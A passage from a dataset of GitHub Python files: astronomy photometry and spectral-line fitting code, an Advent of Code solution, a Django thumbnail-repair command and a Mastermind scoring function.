np.ones(len(x_fit))\n fit_down = popt_dw * np.ones(len(x_fit))\n return x_fit, fit, fit_up, fit_down\n\n @property\n def zero_point(self) -> Tuple[float, float]:\n \"\"\"\n Determines the zero point by fitting a straight line and determining the intercept.\n \"\"\"\n cut = np.where((self.measured_mags > -14) & (self.measured_mags < -11))\n a_fit, cov = curve_fit(\n straight_line, self.measured_mags[cut], self.expected_mags[cut],\n sigma=self.expected_mags_err[cut], absolute_sigma=True)\n uncertainties = np.sqrt(np.diag(cov))\n return a_fit[0], uncertainties[0]\n\n def determine_zero_point_prime(self, aperture_radius: float, seeing: float) -> float:\n \"\"\"\n This is the zero point minus the k_correction. This means that the magnitudes \n in the future would be determined by adding this constant to the k_correction\n which is dependent on the radius.\n\n Must provide the radius of the apertures used by sextractor to determine the magnitudes\n as well as the seeing of the image. Both must be in the same units.\n \"\"\"\n return self.zero_point[0] - calculate_k_constant_mag(aperture_radius, seeing)\n\n\nif __name__ == '__main__':\n INFILE_SEX_I = '../correct_stacks/N964/i.cat'\n INFILE_PAN_I = '../PANSTARS/PANSTARS_i.csv'\n INFILE_SEX_Z = '../correct_stacks/N964/z.cat'\n INFILE_PAN_Z = '../PANSTARS/PANSTARS_z.csv'\n\n INFILE_SEX_I_CDFS = '../CDFS_LAGER/i_cdfs_depth.cat'\n INFILE_PAN_I_CDFS = '../CDFS_LAGER/PANSTARS_i.csv'\n INFILE_SEX_Z_CDFS = '../CDFS_LAGER/z_cdfs_depth.cat'\n INFILE_PAN_Z_CDFS = '../CDFS_LAGER/PANSTARS_z.csv'\n\n SEEING_I = 1.17 # These comes from the seeing calculator.\n SEEING_Z = 1.23\n APERTURE_RADII = 1 #min kron radius\n\n SEEING_I_CDFS = 1.22\n SEEING_Z_CDFS = 1.14\n APERTURE_RADII_CDFS = 1 #min kron radius\n\n\n i_band_cdfs = BroadBand(INFILE_PAN_I_CDFS, INFILE_SEX_I_CDFS, 'i')\n print('i prime cdfs is: ', i_band_cdfs.determine_zero_point_prime(APERTURE_RADII_CDFS, SEEING_I_CDFS))\n i_band_cdfs.plot_zpt()\n os.system('mv plots/i_zpt.png plots/i_zpt_cdfs.png')\n\n z_band_cdfs = BroadBand(INFILE_PAN_Z_CDFS, INFILE_SEX_Z_CDFS, 'z')\n print('z prime cdfs is: ', z_band_cdfs.determine_zero_point_prime(APERTURE_RADII_CDFS, SEEING_Z_CDFS))\n z_band_cdfs.plot_zpt()\n os.system('mv plots/z_zpt.png plots/z_zpt_cdfs.png')\n\n i_band = BroadBand(INFILE_PAN_I, INFILE_SEX_I, 'i')\n print('i prime is: ', i_band.determine_zero_point_prime(APERTURE_RADII, SEEING_I))\n i_band.plot_zpt()\n\n z_band = BroadBand(INFILE_PAN_Z, INFILE_SEX_Z, 'z')\n print('z prime is: ', z_band.determine_zero_point_prime(APERTURE_RADII, SEEING_Z))\n z_band.plot_zpt()\n","repo_name":"TrystanScottLambert/DECam_Photometry","sub_path":"determine_broadband_zpts.py","file_name":"determine_broadband_zpts.py","file_ext":"py","file_size_in_byte":9350,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5658118406","text":"import sys\n\ndef part2():\n lines = sys.stdin.readlines()\n sum = 0\n answer = 0\n table = {\n 0: 0\n }\n notFound = True\n while(notFound):\n for line in lines:\n num = int(line)\n sum += num\n print(\"Sum: \", sum, \"\\tNum: \", num)\n if not sum in table:\n table[sum] = 1\n else:\n table[sum] = table[sum] + 1\n if table[sum] >= 2:\n answer = sum\n notFound = False\n break\n\n print(answer)\n\ndef part1():\n sum = 0\n for line in sys.stdin:\n sum += int(line)\n\n print(sum)\n\ndef main():\n part2()\n\nif __name__ == \"__main__\":\n main()","repo_name":"McRaeAlex/AdventOfCode","sub_path":"2018/day1/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12726418895","text":"from django.core.management.base import BaseCommand\nfrom django.db.models import Count\n\nfrom lstv_api_v1.models import *\nfrom alive_progress import alive_bar\n\nfrom lstv_api_v1.tasks.tasks import job_recalc_weight, job_migrate_image_to_s3\nfrom lstv_api_v1.utils.utils import verify_resource_url, verify_image_url\n\n\nclass Command(BaseCommand):\n def handle(self, *args, **options):\n for vs in VideoSource.objects.filter(thumbnail__isnull=True).all():\n image_url = None\n if vs.media_id:\n if vs.type == VideoTypeEnum.jwplayer:\n image_url = f\"https://content.jwplatform.com/thumbs/{vs.media_id}.jpg\"\n if vs.type == VideoTypeEnum.vimeo:\n image_url = f\"https://i.vimeocdn.com/video/{vs.media_id}_640.jpg\"\n if image_url and verify_image_url(image_url):\n new_image = Image(purpose=ImagePurposeTypes.thumbnail, legacy_url=image_url)\n new_image.save()\n vs.thumbnail = new_image\n vs.save()\n job_migrate_image_to_s3(new_image.id)\n print(f\"{vs.id} - {vs.type} - {image_url}\")\n else:\n print(f\"STILL NEED FIXING - {vs.id} - {vs.type} - {image_url}\")\n","repo_name":"Stevenpijei/wedding-site","sub_path":"lstv_be/lstv_api_v1/management/commands/job_fix_missing_thumbnails.py","file_name":"job_fix_missing_thumbnails.py","file_ext":"py","file_size_in_byte":1260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"31643034206","text":"COLOR_COUNT = 6\n\ndef calcScore(code, guess):\n assert(len(code) == len(guess))\n exact_match = 0\n for c,g in zip(code, guess):\n if c == g:\n exact_match += 1\n counts_c = [0] * COLOR_COUNT\n counts_g = [0] * COLOR_COUNT\n match_count = 0\n for c in code:\n counts_c[c] += 1\n for g in guess:\n counts_g[g] += 1\n for c, g in zip(counts_c, counts_g):\n match_count += min(c,g)\n match_count -= exact_match\n return (exact_match, match_count)\n\ndef isGuessConsistent(guesses, new_guess):\n for g, s in guesses:\n if calcScore(new_guess, g) != s:\n return False\n return True\n\ndef main():\n code = [0, 1, 0, 2]\n guesses = [\n [4,1,3,5],\n [1,2,3,4],\n [5,3,2,0],\n ]\n new_guess = [0,1,0,2]\n guesses = [(g, calcScore(code, g)) for g in guesses]\n # print(guesses)\n result = isGuessConsistent(guesses, new_guess)\n print(result)\n # score = calcScore(code, guess)\n # print(score)\n\nif __name__ == \"__main__\":\n main()","repo_name":"pavlik-y/Scratch","sub_path":"Mastermind/mastermind.py","file_name":"mastermind.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41045614297","text":"#!/scratch/mbarbier/miniconda3/bin/python3\n#\n# (c) mauro barbieri 2023\n# maurobarbieri.science@gmail.com\n#\n\n#********************************************************************************\n#\n# PROGRAM SETUP\n#\n#********************************************************************************\n\nimport os\nimport sys\nimport glob\nimport warnings\nimport logging\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import signal, interpolate, stats\nfrom scipy.signal import correlate, find_peaks, peak_widths\nfrom scipy.ndimage import gaussian_filter\nfrom scipy.interpolate import interp1d\nfrom scipy.optimize import curve_fit\nimport astropy.units as u\nfrom astropy.io import fits\nfrom astropy import constants as const\nfrom astropy.coordinates import EarthLocation, SkyCoord, AltAz, get_body, get_sun, get_moon\nfrom astropy.time import Time\n\n\n# Filter the warning\nlogging.basicConfig(filename='error.log', level=logging.ERROR)\nwarnings.filterwarnings('ignore', category=UserWarning, append=True)\n\n\n#********************************************************************************\n#\n# FUNCTIONS\n#\n#********************************************************************************\n\n#placeholder for new functions\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\n#def funcname():\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef fit_absorption_line2(wavelengths, intensities, wc,ws):\n line_center0 = wc\n wl_span = ws\n mask = (wavelengths > (line_center0 - wl_span)) & (wavelengths < (line_center0 + wl_span))\n wl=wavelengths[mask]\n mf=np.mean(intensities[mask])\n flux_i = 1e6 - intensities[mask]\n flux = intensities[mask]\n npt=len(wavelengths[mask])\n \n \n smoothed_flux_i = gaussian_filter(flux_i, sigma=5)\n smoothed_flux0_i = gaussian_filter(flux_i, sigma=100)\n residuals_i = flux_i - smoothed_flux_i\n rms_i = np.sqrt(np.mean(residuals_i**2))\n threshold_i = 5 * rms_i\n peaks_i, properties_i = find_peaks(smoothed_flux_i, width=11, height=0.01)\n filtered_peaks_i = []\n for i, peak_i in enumerate(peaks_i):\n width_i = properties_i['widths'][i]\n peak_value_i = properties_i['peak_heights'][i]\n local_background_i = smoothed_flux0_i[peak_i]\n local_rms_i = rms_i \n if peak_value_i > local_background_i + 3 * local_rms_i and width_i > 11:\n filtered_peaks_i.append((peak_i, width_i, peak_value_i))\n \n # Sort filtered_peaks by width in descending order\n filtered_peaks_i.sort(key=lambda x: x[1], reverse=True) \n for i, (peak_i, width_i, peak_value_i) in enumerate(filtered_peaks_i, start=1):\n print(f\"{wl[peak_i]:7.2f},{width_i * 0.01:7.3f},{1-(1e6 - peak_value_i)/mf:5.2f}\")\n\n peak_indices_i = [peak_info[0] for peak_info in filtered_peaks_i]\n \n print('n peaks', len(filtered_peaks_i))\n\n# if filtered_peaks: \n# const_guess = np.mean(flux)\n# amplitude_guess = filtered_peaks[0][2]\n# mean_guess = wl[filtered_peaks[0][0]]\n# stddev_guess = filtered_peaks[0][1]\n# else: \n const_guess = np.mean(flux)\n amplitude_guess = np.min(flux) - const_guess\n mean_guess = line_center0\n stddev_guess = 0.2\n\n #fit Gaussian\n ERRORE=0\n try:\n popt_gaussian, pcov = curve_fit(negative_gaussian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERORRE = 1\n popt_gaussian= [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n\n if ERRORE == 0:\n y_fit_gaussian = negative_gaussian(wl, *popt_gaussian)\n errors = np.sqrt(np.diag(pcov))\n continuum_g=popt_gaussian[0]\n amplitude_g=popt_gaussian[1]\n line_center_g=popt_gaussian[2]\n sigma=popt_gaussian[3]\n continuum_g_error = errors[0]\n amplitude_g_error = errors[1]\n line_center_g_error = errors[2]\n sigma_error = errors[3]\n\n # Fit Lorentzian\n ERRORE=0\n try:\n popt_lorentzian, pcov = curve_fit(negative_lorentzian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERORRE = 1\n popt_lorentzian= [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n delta_wl=np.nan\n rv=np.nan\n\n if ERRORE == 0:\n y_fit_lorentzian = negative_lorentzian(wl, *popt_lorentzian)\n errors = np.sqrt(np.diag(pcov))\n continuum=popt_lorentzian[0]\n amplitude=popt_lorentzian[1]\n line_center=popt_lorentzian[2]\n gamma=popt_lorentzian[3]\n continuum_error = errors[0]\n amplitude_error = errors[1]\n line_center_error = errors[2]\n gamma_error = errors[3]\n delta_wl=line_center0-popt_lorentzian[2]\n rv = (line_center/line_center0 - 1)*const.c.to(u.km/u.s).value\n\n mask1 = (wl > (line_center - 2 * gamma)) & (wl < (line_center + 2 * gamma))\n wl_subset=wl[mask1]\n flux_subset = flux[mask1]/continuum\n y_fit_lorentzian_subset = y_fit_lorentzian[mask1]/continuum\n residuals_fit = flux_subset - y_fit_lorentzian_subset\n rms_residuals = np.std(residuals_fit)\n snr=abs(amplitude/continuum)/rms_residuals\n chisq = np.sum((residuals_fit / np.std(flux_subset)) ** 2)\n dof = len(wl) - len(popt_lorentzian)\n reduced_chisq = chisq / dof\n ss_res = np.sum(residuals_fit ** 2)\n ss_tot = np.sum((flux_subset - np.mean(flux_subset)) ** 2)\n r_squared = 1 - (ss_res / ss_tot)\n flux1=1-flux_subset\n# flux1=flux_subset\n sum_flux = sum(flux1)\n npt_subset = len(flux_subset)\n skewness = sum(flux1[i] * (wl_subset[i] - line_center)**3 for i in range(npt_subset)) / (sum_flux * sigma**3)\n kurtosis = sum(flux1[i] * (wl_subset[i] - line_center)**4 for i in range(npt_subset)) / (sum_flux * sigma**4) - 3\n\n log=True\n if log == True:\n print('continuum ',continuum, continuum_error)\n print('intensity ',amplitude, amplitude_error)\n print('central wavelength',line_center,line_center_error)\n print('gamma = width ',gamma, gamma_error)\n print('sigma = width ',sigma, sigma_error)\n print('skewness ',skewness)\n print('kurtosis ',kurtosis)\n print('rms residuals ',rms_residuals)\n print('SNR ',snr)\n print('chi2 ',reduced_chisq)\n print('R2 ',r_squared)\n print('delta wavelength ',delta_wl)\n print('RV ',rv)\n \n plot = True\n if plot == True:\n # Use these indices to extract the corresponding wavelengths and fluxes\n peak_wavelengths = wl[peak_indices_i]\n peak_fluxes = flux[peak_indices_i] / continuum\n x1 = line_center0 - wl_span\n x2 = line_center0 + wl_span\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, gridspec_kw={'height_ratios': [3, 1]})\n manager = plt.get_current_fig_manager()\n manager.window.wm_geometry(\"1200x600+0+0\")\n ax1.plot(wl,flux/continuum, label='Data')\n #ax1.plot(wl,1-smoothed_flux/continuum, label='Data')\n #ax1.plot(wl,1-smoothed_flux0/continuum, label='Data')\n ax1.plot(wl, 1-y_fit_lorentzian/continuum, label='Lorentzian Fit', linestyle='dashed')\n ax1.axvline(line_center0, color='black', linestyle='dashed', label='Center')\n ax1.axvline(line_center-gamma, color='red', linestyle='dashed', label='Center')\n ax1.axvline(line_center+gamma, color='red', linestyle='dashed', label='Center')\n ax1.plot(peak_wavelengths, 1-peak_fluxes, 'o', label='Peaks')\n ax1.set_xlim(x1, x2)\n ax1.set_ylabel('Flux')\n ax1.grid(True)\n ax2.plot(wl, residuals_fit/continuum, label='Residuals')\n ax2.plot(wl, (flux-y_fit_lorentzian)/continuum, label='Residuals')\n ax2.axvline(line_center0, color='black', linestyle='dashed', label='Center')\n ax2.axvline(line_center-gamma, color='red', linestyle='dashed', label='Center')\n ax2.axvline(line_center+gamma, color='red', linestyle='dashed', label='Center')\n ax2.set_xlim(x1, x2)\n ax2.set_xlabel('Wavelength [AA]')\n ax2.set_ylabel('Residuals')\n ax2.grid(True)\n plt.tight_layout()\n plt.show()\n else:\n figatomare = True\n\n return rv,reduced_chisq,gamma,skewness,kurtosis\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef convert_to_air_wavelengths(wavelengths_vac):\n #Convert vacuum wavelengths to air wavelengths using the formula\n #from Donald Morton (2000, ApJ. Suppl., 130, 403)\n #n = 1 + 0.0000834254 + 0.02406147 / (130 - s2) + 0.00015998 / (38.9 - s2), where s = 104 / λvac and λvac is in Ångströms.\n #The conversion is then: λair = λvac / n.\n #see https://www.astro.uu.se/valdwiki/Air-to-vacuum%20conversion\n \n # Calculate s squared\n s = 10**4 / wavelengths_vac\n s2 = s**2\n # Calculate the refractive index \n n = 1 + 0.0000834254 + 0.02406147 / (130 - s2) + 0.00015998 / (38.9 - s2)\n # Convert to air wavelengths\n wavelengths_air = wavelengths_vac / n\n \n return wavelengths_air\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef negative_gaussian(x, const, amplitude, mean, stddev):\n gauss = const - amplitude * np.exp(-((x - mean) / stddev) ** 2)\n return gauss\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef negative_lorentzian(x, const, amplitude, x0, gamma):\n lorentz = const-amplitude * (gamma / ((x - x0)**2 + gamma**2))\n return lorentz\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef fit_absorption_line(wavelengths, intensities, wc,ws, flagd):\n plot=flagd\n log=flagd\n line_center0 = wc\n wl_span = ws\n mask = (wavelengths > (line_center0 - wl_span)) & (wavelengths < (line_center0 + wl_span))\n wl=wavelengths[mask]\n flux = intensities[mask]\n npt=len(wavelengths[mask])\n \n #for attempt in range(5):\n const_guess = np.mean(flux)\n amplitude_guess = np.min(flux) - const_guess\n mean_guess = line_center0 #*(attempt+1)\n stddev_guess = 0.1\n\n #fit Gaussian\n ERRORE=0\n try:\n popt_gaussian, pcov = curve_fit(negative_gaussian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERORRE = 1\n popt_gaussian= [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n\n if ERRORE == 0:\n y_fit_gaussian = negative_gaussian(wl, *popt_gaussian)\n errors = np.sqrt(np.diag(pcov))\n sigma_error = errors[3]\n sigma=popt_gaussian[3]\n\n # Fit Lorentzian\n ERRORE=0\n try:\n popt_lorentzian, pcov = curve_fit(negative_lorentzian, wl, flux, p0=[const_guess, amplitude_guess, mean_guess, stddev_guess], maxfev=2000)\n except RuntimeError as e:\n ERORRE = 1\n popt_lorentzian= [np.nan for _ in range(4)]\n pcov = [[np.nan for _ in range(4)] for _ in range(4)]\n errors = [np.nan for _ in range(4)]\n delta_wl=np.nan\n rv=np.nan\n\n if ERRORE == 0:\n y_fit_lorentzian = negative_lorentzian(wl, *popt_lorentzian)\n errors = np.sqrt(np.diag(pcov)) # Extract the errors from the covariance matrix\n \n continuum=popt_lorentzian[0]\n amplitude=popt_lorentzian[1]\n line_center=popt_lorentzian[2]\n gamma=popt_lorentzian[3]\n continuum_error = errors[0]\n amplitude_error = errors[1]\n line_center_error = errors[2]\n gamma_error = errors[3]\n delta_wl=line_center0-popt_lorentzian[2]\n rv = (line_center/line_center0 - 1)*const.c.to(u.km/u.s).value\n mask1 = (wl > (line_center - 2 * gamma)) & (wl < (line_center + 2 * gamma))\n \n # Subset of flux and y_fit\n wl_subset=wl[mask1]\n flux_subset = flux[mask1]/continuum\n y_fit_lorentzian_subset = y_fit_lorentzian[mask1]/continuum\n \n residuals = flux_subset - y_fit_lorentzian_subset\n rms_residuals = np.std(residuals)\n snr=abs(amplitude/continuum)/rms_residuals\n \n chisq = np.sum((residuals / np.std(flux_subset)) ** 2)\n dof = len(wl) - len(popt_lorentzian)\n reduced_chisq = chisq / dof\n ss_res = np.sum(residuals ** 2)\n ss_tot = np.sum((flux_subset - np.mean(flux_subset)) ** 2)\n r_squared = 1 - (ss_res / ss_tot)\n if r_squared<0 :\n print(\"************************************\")\n print(\"************************************\")\n print(\"* W A R N I N G R2<0 \")\n print(\"************************************\")\n print(\"************************************\")\n # break\n \n \n #if ERRORE == 0:\n #print('attempt ',attempt)\n #if attempt==1000:\n # plot=False\n # log=False\n \n flux1=1-flux_subset\n sum_flux = sum(flux1)\n npt_subset = len(flux_subset)\n \n skewness = sum(flux1[i] * (wl_subset[i] - line_center)**3 for i in range(npt_subset)) / (sum_flux * sigma**3)\n kurtosis = sum(flux1[i] * (wl_subset[i] - line_center)**4 for i in range(npt_subset)) / (sum_flux * sigma**4) - 3\n\n #if amplitude>0 and line_center0>line_center-gamma and line_center0 (line_center0 - wl_span)) & (lambda_values < (line_center0 + wl_span)) \n #mask_lines2 = (lambda_values > (line_center0 - wl_span)) & (lambda_values < (line_center0 + wl_span)) & np.isnan(loggf_values)\n #new_wl = wl*(1+rv/const.c.to(u.km/u.s).value)\n #flux_interpolator = interp1d(new_wl, flux, kind='cubic', bounds_error=False, fill_value=0)\n #new_flux = flux_interpolator(wl)\n new_wl = wl*(1-rv/const.c.to(u.km/u.s).value)\n new_flux = flux\n print(\"Radial velocity (km/s):\", rv)\n print(\"Speed of light (km/s):\", const.c.to(u.km/u.s).value)\n print(\"Expected shift in Angstroms:\", 6562 * (rv / const.c.to(u.km/u.s).value))\n print('mean shift in wavelength',np.mean(wl-new_wl),'mean difference in flux',np.mean(flux-new_flux))\n #for w, f, new_w, new_f in zip(wl, flux, new_wl, new_flux):\n # print(w, f, new_w, new_f)\n print()\n num_plot = 1\n if num_plot == 1:\n fig, ax1 = plt.subplots(1, 1)\n manager = plt.get_current_fig_manager()\n manager.window.wm_geometry(\"1400x1200+0+0\")\n original = False\n if original == True:\n ax1.plot(new_wl,new_flux/continuum, color='orange', linestyle ='dashed', label='Data')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n ax1.axvline(line_center , color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center-gamma, color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center+gamma, color='#FF00CC', linestyle='dashed', label='Center')\n else:\n ax1.plot(new_wl,new_flux/continuum, label='Data')\n ax1.plot(new_wl, y_fit_lorentzian/continuum, label='Lorentzian Fit', linestyle='dashed')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n jj=-1\n for lam, elem in zip(lambda_values[mask_lines], elements[mask_lines]):\n jj= jj+1\n ax1.axvline(lam, color = '#bbbbff', linestyle='dotted')\n ax1.text(lam, ax1.get_ylim()[0]+0.0001*jj, elem, rotation=45, va='bottom')\n #for lam, elem in zip(lambda_values[mask_lines2], elements[mask_lines2]):\n # ax1.axvline(lam, linestyle='dotted')\n # ax1.text(lam, ax1.get_ylim()[0], elem, rotation=45, va='bottom')\n ax1.set_xlim(x1, x2)\n ax1.set_ylabel('Flux')\n ax1.grid(True)\n plt.tight_layout()\n plt.show()\n elif num_plot == 2:\n fig, (ax1, ax2) = plt.subplots(2, 1, sharex=True, gridspec_kw={'height_ratios': [3, 1]})\n manager = plt.get_current_fig_manager()\n manager.window.wm_geometry(\"1800x600+0+0\")\n original = False\n if original == True:\n ax1.plot(new_wl,new_flux/continuum, color='orange', linestyle ='dashed', label='Data')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n ax1.axvline(line_center , color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center-gamma, color='#FF00FF', linestyle='dashed', label='Center')\n ax1.axvline(line_center+gamma, color='#FF00CC', linestyle='dashed', label='Center')\n else:\n # ax1.plot(wl,flux/continuum, color ='#fdfdfd', label='Data')\n ax1.plot(new_wl,new_flux/continuum, label='Data')\n ax1.plot(new_wl, y_fit_lorentzian/continuum, label='Lorentzian Fit', linestyle='dashed')\n ax1.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n for lam, elem in zip(lambda_values[mask_lines], elements[mask_lines]):\n ax1.axvline(lam, color='#00e000', linestyle='dotted')\n ax1.text(lam, ax1.get_ylim()[0], elem, rotation=45, va='top', color='#00a000')\n for lam, elem in zip(lambda_values[mask_lines2], elements[mask_lines2]):\n ax1.axvline(lam, color='#d000b0', linestyle='dotted')\n ax1.text(lam, ax1.get_ylim()[0], elem, rotation=45, va='bottom', color='#8000b0')\n ax1.set_xlim(x1, x2)\n ax1.set_ylabel('Flux')\n #ax1.set_title('H-alpha Line')\n ax1.grid(True)\n #ax1.legend()\n ax2.plot(new_wl, (flux - y_fit_lorentzian)/continuum, label='Residuals')\n ax2.axvline(line_center0, color='#00FF00', linestyle='dashed', label='Center')\n #ax2.axvline(line_center-gamma, color='red', linestyle='dashed', label='Center')\n #ax2.axvline(line_center+gamma, color='red', linestyle='dashed', label='Center')\n for lam, elem in zip(lambda_values[mask_lines], elements[mask_lines]):\n ax2.axvline(lam, color='#000080', linestyle='dotted')\n ax2.set_xlim(x1, x2)\n ax2.set_xlabel('Wavelength [AA]')\n ax2.set_ylabel('Residuals')\n ax2.grid(True)\n plt.tight_layout()\n plt.show()\n else:\n figatomare = True\n \n new_wl = wl*(1-rv/const.c.to(u.km/u.s).value)\n new_flux = flux\n speck=new_flux/continuum\n speck_wl=new_wl\n else:\n figatomare = True\n\n return rv,reduced_chisq,gamma,skewness,kurtosis,speck,speck_wl\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef true_azimuth(angle):\n # convert ESO azimuth convention to astronomical definition of azimuth\n # till 2006.75 ESO used azimuth ranging from 180 to 540 clockwise (N=180, E=270, S=360, W=450)\n # from 2006.75 ESO used azimuth ranging from 0 to 360 clockwise (N=180, E=270, S= 0, W= 90)\n # the correction below (N=0, E=90, S=180, W=270)\n true_azimuth_angle = (angle + 180) % 360\n return true_azimuth_angle\n# ------------------------------ END FUNCTION ------------------------------ #\n\n \n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef convert_from_pseudosexagesimal_to_degrees(hhmmss, ddmmss):\n# Example\n#hhmmss = 123456.43234\n#ddmmss = -1234.5678\n#(hhmmss_str, hhmmss_deg), (ddmmss_str, ddmmss_deg) = convert_to_sexagesimal_and_degrees(hhmmss, ddmmss)\n#print(f\"HHMMSS Sexagesimal Representation: {hhmmss_str}\") \n#print(f\"HHMMSS Degrees: {hhmmss_deg}\")\n#print(f\"DDMMSS Sexagesimal Representation: {ddmmss_str}\") \n#print(f\"DDMMSS Degrees: {ddmmss_deg}\")\n\n # Function to convert a single part\n def convert_part(number, is_degrees=False):\n # Separating the integer and fractional parts\n integer_part = int(abs(number))\n fractional_part = abs(number) - integer_part\n\n # Converting integer part\n hours_or_degrees = integer_part // 10000\n minutes = (integer_part // 100) % 100\n seconds = integer_part % 100 + fractional_part\n \n # Forming the sexagesimal string representation\n sexagesimal_str = f\"{int(hours_or_degrees):02d}:{int(minutes):02d}:{seconds:02f}\".rstrip('0').rstrip('.')\n if number < 0 and is_degrees:\n sexagesimal_str = '-' + sexagesimal_str\n \n # Convert to degrees\n total_seconds = hours_or_degrees * 3600 + minutes * 60 + seconds\n if is_degrees:\n degrees = total_seconds / 3600\n if number < 0:\n degrees = -degrees\n else:\n degrees = total_seconds * 15 / 3600\n \n return sexagesimal_str, degrees\n \n # Convert hh:mm:ss.xs\n sexagesimal_hhmmss, degrees_hhmmss = convert_part(hhmmss)\n \n # Convert dd:mm:ss.xs\n sexagesimal_ddmmss, degrees_ddmmss = convert_part(ddmmss, True)\n \n return degrees_hhmmss, degrees_ddmmss, sexagesimal_hhmmss, sexagesimal_ddmmss\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef testfilefits(myfile):\n if os.path.exists(myfile) and os.path.getsize(myfile) > 0:\n with open(myfile, 'rb') as f:\n first_line = f.read(6) # read the first 6 characters\n if first_line.startswith(b'SIMPLE'):\n isfits = True\n else:\n print(f'{myfile} is_not_a_valid_FITS_file')\n isfits = False\n else:\n print(f'ERR {myfile.replace(\"/scratch/mbarbier/mylocal/machines/Desktop_media/SeagateHub/DATA/HARPS/harpstar/data/\",\"\")} not_found_or_empty')\n isfits = False\n return isfits\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef calculate_star_altaz(ra, dec, geolon, geolat, elevation, mjd, humidity=None, temperature=None, pressure=None):\n star_coords = SkyCoord(ra=ra * u.deg, dec=dec * u.deg)\n obs_location = EarthLocation(lon=geolon * u.deg, lat=geolat * u.deg, height=elevation * u.m)\n obs_time = Time(mjd, format='mjd')\n altaz_frame = AltAz(obstime=obs_time, location=obs_location)\n\n star_altaz = star_coords.transform_to(altaz_frame)\n star_azimuth0 = star_altaz.az\n star_altitude0 = star_altaz.alt\n\n altaz_frame_with_atmosphere = AltAz(obstime=obs_time, location=obs_location, obswl=550 * u.nm,temperature=temperature * u.deg_C, pressure=pressure * u.mbar, relative_humidity=humidity)\n star_altaz = star_coords.transform_to(altaz_frame_with_atmosphere)\n star_azimuth = star_altaz.az\n star_altitude = star_altaz.alt\n\n return star_azimuth, star_altitude, star_azimuth0, star_altitude0\n# ------------------------------ END FUNCTION ------------------------------ #\n\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef calculate_sun_position(mjd, lon, lat, elevation):\n location = EarthLocation(lon=lon*u.deg, lat=lat*u.deg, height=elevation*u.m)\n time = Time(mjd, format='mjd')\n\n sun_altaz = get_sun(time).transform_to(AltAz(obstime=time, location=location))\n sun_ra_dec = get_sun(time).transform_to('icrs')\n\n sun_altitude = sun_altaz.alt\n sun_azimuth = sun_altaz.az\n\n return sun_ra_dec.ra, sun_ra_dec.dec, sun_altitude, sun_azimuth\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef calculate_moon_position(mjd, lon, lat, elevation):\n location = EarthLocation(lon=lon*u.deg, lat=lat*u.deg, height=elevation*u.m)\n time = Time(mjd, format='mjd')\n\n moon_altaz = get_moon(time).transform_to(AltAz(obstime=time, location=location))\n moon_ra_dec = get_moon(time).transform_to('icrs')\n\n moon_altitude = moon_altaz.alt\n moon_azimuth = moon_altaz.az\n\n return moon_ra_dec.ra, moon_ra_dec.dec, moon_altitude, moon_azimuth\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_lowpass(cutoff, nyq_freq, order=4):\n normal_cutoff = float(cutoff) / nyq_freq\n b, a = signal.butter(order, normal_cutoff, btype='lowpass')\n return b, a\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_lowpass_filter(data, cutoff_freq, nyq_freq, order=4):\n b, a = butter_lowpass(cutoff_freq, nyq_freq, order=order)\n y = signal.filtfilt(b, a, data)\n return y\n# ------------------------------ END FUNCTION ------------------------------ #\n\n# ------------------------------ BEGIN FUNCTION ------------------------------ #\ndef butter_highpass(cutoff, nyq_freq, order=4):\n 